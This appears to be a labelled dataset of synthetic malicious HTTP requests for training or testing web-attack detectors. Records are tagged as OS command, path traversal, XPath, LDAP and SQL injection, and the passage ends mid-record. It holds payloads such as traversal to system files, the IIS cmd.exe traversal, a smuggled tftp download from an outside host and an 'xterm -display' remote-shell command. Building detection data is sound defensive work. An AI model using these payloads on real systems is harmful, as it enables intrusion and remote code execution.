GET /ezipHO/f.70s1I/cDqaccess_logYkZFWI_/see7u.Tiingzq/niaytiyeftfraee/sBeba.2DKvzsSpY/1VKVgroup byl42B4r/aEL/eubgM@/uvei4/47Llink/0Jx.jpeg?e3ntx2eh=eThns&2swofacxS=b%2BeTsIhtaccesAf+d2t%3C&aclta=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.0
Host: 200.128.173.176
Connection: iasrhut
Accept: application/rtf;q=0.8, audio/*;q=0.1
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 189.238.147.1
Cookie: hzrArkq=a q;Ihnsiln=7324;tDteebs2=kf@Ch2bew
Cookie2: $Version="4"
Date: Sun, 14 Dec 08 12:47:13 UTC
ETag: W/"PFUNEE-2p-Js2P9AZMS"
Expect: 100-continue
From: hwpha@Suan.org
If-Modified-Since: Sat, 06 Aug 05 09:55:35 UTC
If-Unmodified-Since: Sat, 06 Mar 10 07:01:12 GMT
If-Match: "v1JcWPbHSR.h.N9NyA"
If-None-Match: *
If-Range: Mon, 25 May 09 02:58:15 GMT
Max-Forwards: 79
MIME-Version: 3.3
Pragma: i5H2n='hkcuc'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM dmFzZm1ua29vT3NjZW5mZHd0ZXJ0YWFzOERsdWlKZVR1Z2NuY3JrbzBy
Range: 903-3,3-4324,-8
Referer: http://www.npg3e.gov/rnc9iear/teudEeOi.cgi
TE: deflate;q=0.6,trailers,trailers
Trailer: Accept-Language
User-Agent: vttaoar/5.9.9
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/4.3 www.wnnwiisi.html, FTP/8.4 205.228.24.78:45
Transfer-Encoding: deflate
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45545
Start - Id: 43155
class: OsCommanding
GET /iesa.css?omte=264059553&kL-W@dpositionqMexmlM=teouttzshn&luunuidkH=itwindow.openezhelike&iett2sm=xMHH&vqo9t=s.D&eyihus=aaE&Set=rQhvaszrneNwmes8&zsel257=fsAc&i0tm=%27+%3B+++tftp++++-c+get+++++www.ilrinaonlare.com%3A%2Fnesero.tar HTTP/1.0
Host: www.beqm.org:6586
Connection: hlmln
Accept: image/*, image/*
Accept-Charset: windows-1257, iso-8859-7, x-mac-icelandic;q=0.4, iso-8859-8;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="08"
Date: Sat, 08 Aug 09 11:59:55 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: aNg2ee
From: riAeyrh@tgaMea.st
If-Modified-Since: Fri, 06 Apr 07 16:04:23 UTC
If-Unmodified-Since: Sat, 15 Jul 06 09:15:43 GMT
If-Match: "UOflgWQ3He.Mn2-krRv9"
If-None-Match: "UoQL0QEGsw-9tk4lG"
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 69
MIME-Version: 1.6
Pragma: dt='6ol'
Proxy-Authorization: 4lhm thmdu=aoeoa
Authorization: Basic RGVvcGpnNjpkb3RpT0hl
Range: 46359-,93372-15,76-
Referer: /ejeetta/syslilst.exe
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.9 (X11; U; Linux i386 2.1; eS-fi; rv:0.8.7) Gecko/18972603
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: sorse/2.7 www.heeeEi.shtml
Transfer-Encoding: Wmpl; t8baeaea=eetcsl
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 9.181.32.5
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43155
Start - Id: 49104
class: XPathInjection
GET /vHLffcconnectwindow.open_CbF/syLYkTY3b/wnne4iseo2ha/ttotxy.nsf?sHdrAc0anyY5n=rauaen%2Ft3Nvn%2Ft%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D830%5D+%7C+++++t%2Fuerv8s%2Fgyem%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D539%5D++or++++%27idsnp%27++%3D++%27&msnocfnse=66717&ijh2=51078485&ietuoxFr=265045&BGJlMSFwp-M4=9&eE=hhe5lSlEiMoDad&er2gsolooe=yea&onoe=s+0&coerorhoieert=48e4t1&or4eyiliwi19ury=9849377 HTTP/1.0
Host: www.eoeUetstr.ch:376
Connection: 32dsr
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: ur92whor-RuziPdl, hr23p8nb-yn6t, ehice-wi;q=0.0, darn-Ak;q=0.8, tmsr-dAotik8n;q=0.1
Cache-Control: ephrtr='dott'
Client-ip: 139.222.82.202
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Wed, 19 Sep 07 07:30:18 CET
ETag: "i9p280DZTSCOq9@T"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sun, 05 Jun 05 14:00:58 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: *
If-Range: Mon, 30 Aug 04 16:11:58 UTC
Max-Forwards: 766
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: et64ot flE5y=1aat
Range: 80-
Referer: http://tramjel.it/aae5rr/hehtur/kodB/LvsYb/KeZszntN.dll
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.7 (compatible; MSIE 0.4; Linux i386; eosei)
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: 8.6 151.112.194.68
Transfer-Encoding: deflate
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49104
Start - Id: 36291
class: PathTransversal
GET /_gDpDw3/okbshQFCLW7h2/eaL0OOEM/d8XzMhcxAO2./s7aeditorH/Aenp/eut.asmx?xUsS=aQqgqo&mi=brs&5slfmboer=%2Fetc%2Fhttpd%2Fhttpd.conf HTTP/1.0
Host: 174.163.87.32
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: inp43tr-ska6soT;q=0.3, m-nsnchs;q=0.1, aapiabeE-aer;q=0.5, nmN-xtSomyh
Cache-Control: no-store
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Fri, 30 Oct 09 18:43:37 GMT
ETag: "9as6V4Gtf64Xu1_Hj"
Expect: 100-continue
From: dtehsE@fwehd4rfrs.com
If-Modified-Since: Sat, 03 Apr 10 18:35:32 UTC
If-Unmodified-Since: Fri, 04 Sep 09 23:19:52 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Aug 06 23:44:30 GMT
Max-Forwards: 9
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: NTLM cmE0b1luZW1udHJiaWNkNW50ZWpvaW42dGVhbTJpYWhu
Range: 48895-751657,65-
Referer: /3iMrvlsm.mp3
TE: trailers
Trailer: Accept-Encoding
User-Agent: iNrswbes (znXVW5aU5l)
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: agi/6.0 49.140.117.5
Transfer-Encoding: gzip
Upgrade: ye1nNS/5.5
Warning: 517 www.aoior0c.tiff:33767 "TpadeIe" 
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36291
Start - Id: 45311
class: PathTransversal
GET /tAksp/tngy29u5sfRadHkc/tAeLb61iBs/ejcAgCmsh6E/y1yT3BIvQ/s@HWqgAuif-/0aonethlF/Ahso/5toat74o1eex3aogth/likeQkmwvB5AG5/ittwlmeNsSozet/rzBoXg@fS_lysY.png?vca6a=09&4Z.GHNSV=uBvaSrf&eptrs=31&ep=E3hciTTn+uf&v@0jetc=tat&tsiku5uiimams2=yemb&4emvlee=77065&ieex1dehoeO=5239426586&naeoLeih=nnzinftO&.AX-QxAMShHr=42 HTTP/1.0
Host: 86.216.92.91
Connection: keep-alive
Accept: text/plain, video/mpeg;q=0.2
Accept-Charset: iso-8859-6, windows-1254;q=0.5, shift_jis;q=0.5
Accept-Encoding: *
Accept-Language: te-s
Cache-Control: min-fresh=52
Client-ip: 168.109.233.73
Cookie: fOr=../../../../../../WINDOWS/autoexec.bat;Oudnaty=group byphp@i-o[1(wget
Cookie2: $Version="7"
Date: Tue, 01 Aug 06 12:02:03 GMT
ETag: "cp6-YrqKqMUQGf6"
Expect: erzu
From: fbha1@fWynosH.gov
If-Modified-Since: Wed, 05 Dec 07 02:23:37 GMT
If-Unmodified-Since: Fri, 29 Feb 08 14:43:56 CET
If-Match: "h7.qDOf_n7c_rvBt"
If-None-Match: *
If-Range: Tue, 13 Nov 07 08:29:52 CET
Max-Forwards: 61
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/a5ssi/n3Ecoh.bin
Authorization: daqeF euty=eu809
Range: 1448-672,0738-
Referer: http://www.cgne.org/mnRseS.asmx
TE: trailers
Trailer: Accept-Charset
User-Agent: sFyPe (nb_h2Q8EOP; rIoXIQ0Pkn; exIub6; lbcazt8; 5@njSPm)
UA-CPU: 68000
UA-Disp: 710,703,16
UA-Color: color8
UA-Pixels: 7175x8501
Via: 0.7 91.149.82.129
Transfer-Encoding: gzip
Upgrade: eTg3a/6.0
Warning: 903 www.geeeueha.html "p6zashvaoAtaye" "Sun, 14 Sep 08 14:09:13 CET"
X-Forwarded-For: 77.147.136.100
X-Serial-Number: 29666070
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45311
Start - Id: 35620
class: XPathInjection
GET /rtQJ8ewrNt/wSATRHt0cYzx_nM-Ntl/ITU0GVk/e4/wFemoG0k16zjONdgDc/tYUg0VG1vP8H0dKG/8n/wCe/Py@X8ZQrYUqNAB/oYuoAD/esaiejrgoewfsy9jtok.tiff?wttdonetiubei=1&oqbEaothogt=tn&3s98m1exduitn=turn%27+++++or+6++%3C+++++count%28path%2Fchild%3A%3A*%29++++or+++++%27yse%27+%3D+%27&y2h=40&oeneu=from&zs79alhx=yltsakeRou HTTP/1.1
Host: 212.178.47.95
Connection: close
Accept: text/xml;q=0.7, audio/*
Accept-Charset: windows-1251
Accept-Encoding: *;q=0.9
Accept-Language: ly9n0-woeetrae;q=0.6
Cache-Control: no-cache
Client-ip: 98.222.4.65
Cookie: aAIna=nge4zi92NR@;iernismmils=377830;wnni9ehDsneoz=2RhK3hraBd;9echoeZKE.GAgq7=aIffoG$skl
Cookie2: $Version="65"
Date: Mon, 01 Mar 04 22:17:57 UTC
ETag: W/"xTHpvz5ahfoa5jv_KuRj"
Expect: 100-continue
From: eopr@Obgt7.be
If-Modified-Since: Fri, 20 Jul 07 03:01:23 GMT
If-Unmodified-Since: Wed, 07 Jan 09 23:29:38 UTC
If-Match: *
If-None-Match: "GYvZt0FQnsL2HkwjMVKZ"
If-Range: Fri, 23 Apr 04 22:46:36 UTC
Max-Forwards: 8
MIME-Version: 1.3
Pragma: abs='4gy'
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: rvs9tJ wtssiti=ly3bi
Range: -827333,2893-
Referer: http://www.trftitu.be/s1nue/Hfso5/hsici/eduhe.htm
TE: trailers
Trailer: Expect
User-Agent: e5GK5AHQT7 http://www.wmEo.biz
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: nia/0.0 162.230.145.112, fn4/8.1 177.244.103.81:1
Transfer-Encoding: compress
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35620
Start - Id: 43016
class: OsCommanding
PUT /Hi/eglinr1TndatSehw0g/e6oV7t15_/4w/9anteslbhau69a2er/rJ7/rot7tttp.cgi? HTTP/1.1
Content-Length: 250
Content-Language: rboT,otb
Content-Encoding: identity
Content-Location: /m8oDogt/heeoode/isliLng/ilieieme.cgi
Content-MD5: aTB1ZW1UcmllMG95bjZOZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 20:22:48 GMT
Last-Modified: Mon, 14 Dec 09 19:07:25 GMT
Host: 247.118.17.93
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: netn-Jas;q=0.8, ahNy-ahEi
Cache-Control: no-transform
Client-ip: 87.239.190.162
Cookie: becR=tv1ipseTO93ikueen;htccutys4=-forme m;wei8btv=t_BB9DfsE;tmpklhpLZ25@tmpD= ;dhdlle8hbuess=I;ewaixAeovuotm=oitae7es 4jz
Cookie2: $Version="073"
Date: Mon, 11 Jun 07 03:02:29 CET
ETag: "v0-1@Rv2TACZbOUJTaV"
Expect: hnujl5=enoyt;3ssa
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 01 Jun 05 12:23:03 CET
If-Unmodified-Since: Fri, 17 Jun 05 07:58:37 GMT
If-Match: *
If-None-Match: "u2dVfz8tclrlcaw"
If-Range: "yc@8RMumpyWT.AKlhK"
Max-Forwards: 6
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Digest realm
Range: 171-10,013-0,-6
Referer: http://0Seie.fr/osxnaos/toego/urvkdw.swf
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 6.7; ih-xm; rv:4.2.7) Gecko/07321783
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/4.4 www.amPgema6.jpg, 5.0 www.1serloi.htm
Transfer-Encoding: compress
Upgrade: 0yU/2.3, ikP/9.3, iaY/2.4, vete/4.6, SjSgdt/2.7
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

RutIicahbei=cihtd\Nli&anm8ssfslmyt=705CAdr&teelhetzsv=42742&gtgts1em=dnoteTnitiapeeEci&91U7bBy7CC=962893&Vitwitttyesajau=252&nhdeyi7a3Soneha=8grcpa&_dkEk=50&r7amvodFn=2820541&Wcz8documentP=722865&se=\r     xterm     -display   20.46.224.254:0.0

End - Id: 43016
Start - Id: 37586
class: LdapInjection
PUT /bxWb4PjG8.A9oDOL/tcVGW_BHz1W9BU7/execzdS-U/dmhs4a/ekt0ZA/g9ezeCNhia8Wol/tzuzcfBLMBaoIueFbR7/nD9GJ7/hlhnen2eicihoOo/pHe9S4.shtml? HTTP/1.1
Content-Length: 75
Content-Language: uwj,o,3zaeOvim
Content-Encoding: compress
Content-Location: /godoo/Sioo.msf
Content-MD5: OGVUdHJlb2VlamluZWl5Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 05:20:42 CET
Last-Modified: Mon, 10 Jul 06 03:38:05 CET
Host: www.oed4rrot.gov:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-5;q=0.0
Accept-Encoding: gzip;q=0.4
Accept-Language: *;q=0.6
Cache-Control: tizpdr=tflit73
Client-ip: 155.85.242.243
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="987"
Date: Fri, 22 Jan 10 22:49:41 UTC
ETag: "wzX9YwDYNjZQVIy@"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 04 Feb 06 09:02:08 UTC
If-Unmodified-Since: Tue, 06 Jan 09 23:10:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Dec 06 12:50:19 UTC
Max-Forwards: 2246
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM aXRvYXBhbnVvbFdadnBhb29zaWVscnN0dGh1dHI1bW5hYW50bGVDZXd1YWU=
Range: 9-357
Referer: /eeT7ox/n6Aw/triPesT5.tiff
TE: deflate;q=0.6,chunked
Trailer: TE
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 4.4; bu-3r; rv:7.5.5) Gecko/46431439
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: HTTP/7.6 40.145.238.130, Ieeeto/5.5 www.clbf.htm, 9.8 www.i69or.js:58
Transfer-Encoding: gzip
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 403 254.22.140.185:97 "tfj3g2" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wynhmciatR3=7545111&ecnRgotoE=tea)( | (6moe9=*)&meta_Lh2N=47314

End - Id: 37586
Start - Id: 49186
class: XPathInjection
GET /egr/8al6GqNBxKx@Dww/tHcoThgy8IxYpNoibH8b/u2zlh5UpKcpassthrucq1c/netrreiglAoGnaaiaa/rymit/eMW@BCcE4-bk2uf/cF/is_N9i2of9i/o4e.Ka.US0a.js?ti=4+++++or+lzcn%2Fabbtxm%2Ftonay%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D++or++++19941%3D&ncEtnaEbmpeRih=38555517&crvri3iht=9&lo2e=aejsoUhlo2gdta&9aahnoamegCh7n=ghnnatd&tt19men=Jn3pes4dph&nxhaadryL=bfXC&WU@cBif=0565899260&eksre=l5a1odbmnhohtl1bs&vtietcrlhnd=eOistutm HTTP/1.0
Host: www.ernn4ti.com
Connection: oNyt
Accept: text/*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, deflate, deflate, identity, compress
Accept-Language: al5Laand-ed;q=0.6, hR-1;q=0.4, o-t;q=0.1
Cache-Control: a=nlwicos
Client-ip: 69.65.142.204
Cookie: JQThdelete0wiy=uQth
Cookie2: $Version="1"
Date: Wed, 30 May 07 18:16:16 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: 100-continue
From: ir0psea@aO25fruan.gov
If-Modified-Since: Mon, 31 Aug 09 03:45:58 GMT
If-Unmodified-Since: Mon, 27 Nov 06 21:44:35 GMT
If-Match: "g.J3EFOmTT@-gnm"
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 75
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Digest uri=/amizr/ils8g/nze9.png
Range: 87-,-69535,7135-70843
Referer: http://oagyrc.fr/a1leldn/ammdsamh.tiff
TE: trailers,gzip,gzip;q=0.6
Trailer: Connection
User-Agent: Mozilla/2.5 (compatible; Konqueror/6.9; WinNT; tDTti)
UA-CPU: x86
UA-Disp: 809,4297,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: FTP/0.0 www.dseSe.shtml, 6.9 18.115.225.102
Transfer-Encoding: deflate
Upgrade: bsoiya/9.6, eenia/6.5, aS9o/1.1, arlp/7.1
Warning: 041 154.67.233.24 "haubeWaseRhJat" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49186
Start - Id: 43824
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 142.109.200.3
Connection: keep-alive
Accept: image/*, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=44441
Client-ip: 110.26.184.172
Cookie: 5Oje9svR=hkall;ivasptt1e=u8p8c;62Kusock_streamE=Xtotmpltird
Cookie2: $Version="87"
Date: Fri, 15 Apr 05 06:48:19 CET
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Fri, 09 Jul 04 02:07:55 UTC
If-Unmodified-Since: Fri, 14 Nov 08 23:23:36 GMT
If-Match: "OAeiJS.lb_lP-QM"
If-None-Match: "7s7SRKbQkuCuL9ogF_P."
If-Range: Fri, 06 Apr 07 03:37:59 GMT
Max-Forwards: 31
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: nhtAee iSca=rh9xakc
Range: 7246-,-7950
Referer: /Es9t.msf
TE: deflate
Trailer: Accept
User-Agent: Mozilla/6.3 (X11; U; SunOS sun4u 4.0; 5e-Ec; rv:8.8.3) Gecko/26904462
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 7.3 www.eohnR.tiff, 5.2 88.65.214.58
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43824
Start - Id: 35993
class: PathTransversal
PUT /teseastnxong/n876HA-UG7efFMdasN57.jpg? HTTP/1.1
Content-Length: 141
Content-Language: gniasw
Content-Encoding: gzip
Content-Location: /unovAfd.cfm
Content-MD5: YW5vc2xiOWFkcW82M3dpOA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Nov 08 03:18:19 UTC
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 94.24.44.159
Connection: keep-alive
Accept: audio/basic;q=0.9, text/*;q=0.8
Accept-Charset: cp-936, iso-8859-15;q=0.2, iso-8859-15, iso-8859-8;q=0.2
Accept-Encoding: identity, deflate;q=0.5, identity;q=0.7
Accept-Language: h5am-nwozt;q=0.4, 7eman2i-ob
Cache-Control: eM=bO
Client-ip: 11.175.85.5
Cookie: e5=D3c;irww=49;GEheawl=876090;ohl5=n2/tt
Cookie2: $Version="232"
Date: Sun, 18 Dec 05 04:37:12 UTC
ETag: W/"BlYWiXEeTeQyj4LLGp5t"
Expect: 100-continue
From: hacs@cltuesA.com
If-Modified-Since: Thu, 06 Apr 06 09:15:52 CET
If-Unmodified-Since: Tue, 15 Jun 04 19:07:55 CET
If-Match: "v_cwi9t0WfCQg9-Qhh"
If-None-Match: *
If-Range: Mon, 01 Dec 08 01:46:02 UTC
Max-Forwards: 0896
MIME-Version: 5.1
Pragma: yiene3ai='roxtNSns'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Digest opaque="rnoofl"
Range: 799-,4-,-692713
Referer: http://www.p42srdx.ch/irhwpC/rn1hy/fhatbetr.gz
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/6.6 (compatible; MSIE 2.1; Unix; tEleori; et1cd; 6IRtni)
UA-OS: Win98
UA-Pixels: 551x993
Via: 1.8 www.eoomaJo.html, 6.6 2.182.240.107
Transfer-Encoding: ntnn
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

R1sfa=22&ertrLt=26&tes=4twindow.opendd k%npgtbihitsh&pylZwKhbzK=nri7eotuhfv1&botzao=\autoexec.bat&drire=349970&emhl=w&rcthmosp=zileaUmtJe

End - Id: 35993
Start - Id: 45649
class: PathTransversal
GET /6asx1Nnh1oeohoe/t4RMyJ@Qj4Fq1jTQbT/tqaNJj0kAMeX2@/czA6QqV2t2Z/ktbOrehn0chpnento/hZc6tWD/sAT0a7W/ivIWIwAVQNCke4R8zjlA/lVEXwKP1GwSN8y/nc3git5y/s6uteeen6osgp/3naetrmnibsinOvd.png?ebio=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: 71.109.109.203:58999
Connection: close
Accept: text/plain;q=0.1, video/*;q=0.3, video/mpeg
Accept-Charset: macintosh, iso-8859-7, x-mac-chinesesimp;q=0.0, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 49.59.138.232
Cookie: replaceZDkD=25
Cookie2: $Version="427"
Date: Sun, 04 Jul 04 23:44:11 UTC
ETag: "@9jfyx5Jsp9gY1D-"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Thu, 15 Jan 09 11:24:38 GMT
If-Unmodified-Since: Wed, 10 Mar 10 22:57:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic dG5vczpJbmkxZQ==
Range: 6451-1616,73067-
Referer: http://sdral.gov/tnhoaR.php
TE: trailers,chunked;q=0.0
Trailer: If-Match
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 5.7; hi-oo; rv:5.8.5) Gecko/66658670
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 702 www.ikMktgs.gif "4eeenmnrnbeDidot" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45649
Start - Id: 37051
class: LdapInjection
GET /uIHattrc/meeer1im/wmqSV39XAtMW_zall/eA8Yn4zh1LVM4BZh/iuAtC8McG_S/sdUBZ8aN.3Gteel/ndD6/3Bfid/t28uhwl/ysUi2nnetteOzjatie.tiff?n1=pas&1rdlrbAGwm=hEEuRB&faa=+mut%3EitcGkkR&sp3inOerkd=14391&mw8byservicesze_yp=2387%29%28%26%28objectClass%3Dica%29%28%7C%28sn++++%3D+++oxtg%29%28cn%3Dlre++++J*%29%29&LXXMA8uE=qyVvqefJl9i&I9=0zetz5&-VzY=91152&Ljmaad=llon&formpoAXwbGb=brnRsucel&iN0laixshidoX=ro%3CimispmetaF HTTP/1.0
Host: www.eAlhd.de:53077
Connection: eet2u
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 197.60.249.140
Cookie: D6e=e;4qZIneSzi=113222
Cookie2: $Version="300"
Date: Fri, 19 Sep 08 07:49:48 CET
ETag: W/"IEKMqsmRqtDiKn8U3"
Expect: 100-continue
From: ibiyuSf@istTee.cz
If-Modified-Since: Fri, 07 Aug 09 20:36:45 GMT
If-Unmodified-Since: Sat, 31 Oct 09 24:02:31 UTC
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 6
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 5i2re 1lveu=8spaotso
Range: 03242-,-0
Referer: http://www.ooVb8xlP.it/ydndimy/xtf7/91riQsn1.php4
TE: deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.3 (Windows; U; WinNT 0.7; sd-hb; rv:4.0.4) Gecko/18759908
UA-CPU: 68000
UA-Disp: 922,7603,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 902x8405
Via: 4.1 185.246.47.25, 1.9 www.6cDu0se.jpg
Transfer-Encoding: compress
Upgrade: nopuat/4.5
Warning: 722 60.238.142.91:0 "bhsRneTrnvR4cnsrez" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37051
Start - Id: 42741
class: SqlInjection
POST /tDZb0g/8hAi1tuettetfeiL/itDeruylnzeTG.css? HTTP/1.0
Content-Length: 265
Content-Language: ewtytjm,4ire4e,vHaea0n
Content-Encoding: identity
